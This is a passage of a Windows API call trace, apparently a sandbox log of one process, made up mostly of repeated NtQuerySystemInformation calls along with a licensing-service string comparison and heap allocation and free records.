NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edb0, Length=0x28, ResultLength=0x0) [0295.722] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0295.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0295.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec00, Length=0x28, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0295.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0295.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0295.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0295.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0295.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7e0, Length=0x28, ResultLength=0x0) [0295.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0295.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0295.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e700, Length=0x20, ResultLength=0x0) [0295.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0295.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0295.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7c0, Length=0x20, ResultLength=0x0) [0295.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x40, ResultLength=0x0) [0296.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0296.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0296.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0296.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0296.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0296.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.465] GetProcessHeap () returned 0x269489b0000 [0297.465] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c578a0 [0297.465] GetProcessHeap () returned 0x269489b0000 [0297.466] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x128) returned 0x269489c02e0 [0297.466] GetProcessHeap () returned 0x269489b0000 [0297.466] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcc090 [0297.466] GetProcessHeap () returned 0x269489b0000 [0297.466] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1830 [0297.466] GetProcessHeap () returned 0x269489b0000 [0297.466] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489bff50 | out: hHeap=0x269489b0000) returned 1 [0297.466] GetProcessHeap () returned 0x269489b0000 [0297.466] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1dc) returned 0x26949710800 [0297.468] GetProcessHeap () returned 0x269489b0000 [0297.468] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xfc) returned 0x26948a0e620 [0297.469] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217ebd8 | out: phModule=0xa78217ebd8*=0x7ffcea380000) returned 1 [0297.469] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0297.469] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217ed00, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217ed00, ResultLength=0x0) returned 0x0 [0297.472] GetProcessHeap () returned 0x269489b0000 [0297.472] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c57f60 [0297.472] GetProcessHeap () returned 0x269489b0000 [0297.472] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x48) returned 0x26949c30be0 [0297.472] GetProcessHeap () returned 0x269489b0000 [0297.472] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcc8d0 [0297.473] GetProcessHeap () returned 0x269489b0000 [0297.473] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d15a0 [0297.474] GetProcessHeap () returned 0x269489b0000 [0297.474] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x34) returned 0x26949c57ca0 [0297.474] GetProcessHeap () returned 0x269489b0000 [0297.474] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489c0ff0 | out: hHeap=0x269489b0000) returned 1 [0297.474] GetProcessHeap () returned 0x269489b0000 [0297.474] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269489c02e0 | out: hHeap=0x269489b0000) returned 1 [0297.474] GetProcessHeap () returned 0x269489b0000 [0297.474] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcc090 | out: hHeap=0x269489b0000) returned 1 [0297.474] GetProcessHeap () returned 0x269489b0000 [0297.474] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1830 | out: hHeap=0x269489b0000) returned 1 [0297.474] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c578a0 | out: hHeap=0x269489b0000) returned 1 [0297.475] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949710800 | out: hHeap=0x269489b0000) returned 1 [0297.475] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0e620 | out: hHeap=0x269489b0000) returned 1 [0297.475] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c30be0 | out: hHeap=0x269489b0000) returned 1 [0297.475] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcc8d0 | out: hHeap=0x269489b0000) returned 1 [0297.475] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d15a0 | out: hHeap=0x269489b0000) returned 1 [0297.475] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c57f60 | out: hHeap=0x269489b0000) returned 1 [0297.475] GetProcessHeap () returned 0x269489b0000 [0297.475] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c30c30 | out: hHeap=0x269489b0000) returned 1 [0297.477] GetProcessHeap () returned 0x269489b0000 [0297.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a51a40 | out: hHeap=0x269489b0000) returned 1 [0297.477] GetProcessHeap () returned 0x269489b0000 [0297.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c57ca0 | out: hHeap=0x269489b0000) returned 1 [0297.477] GetProcessHeap () returned 0x269489b0000 [0297.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcbf30 | out: hHeap=0x269489b0000) returned 1 [0297.477] GetProcessHeap () returned 0x269489b0000 [0297.477] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1820 | out: hHeap=0x269489b0000) returned 1 [0297.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0297.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0297.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0297.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0297.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0297.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed70, Length=0x28, ResultLength=0x0) [0297.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0297.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0297.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec50, Length=0x20, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0297.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0297.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0297.494] NtQuerySystemInformation 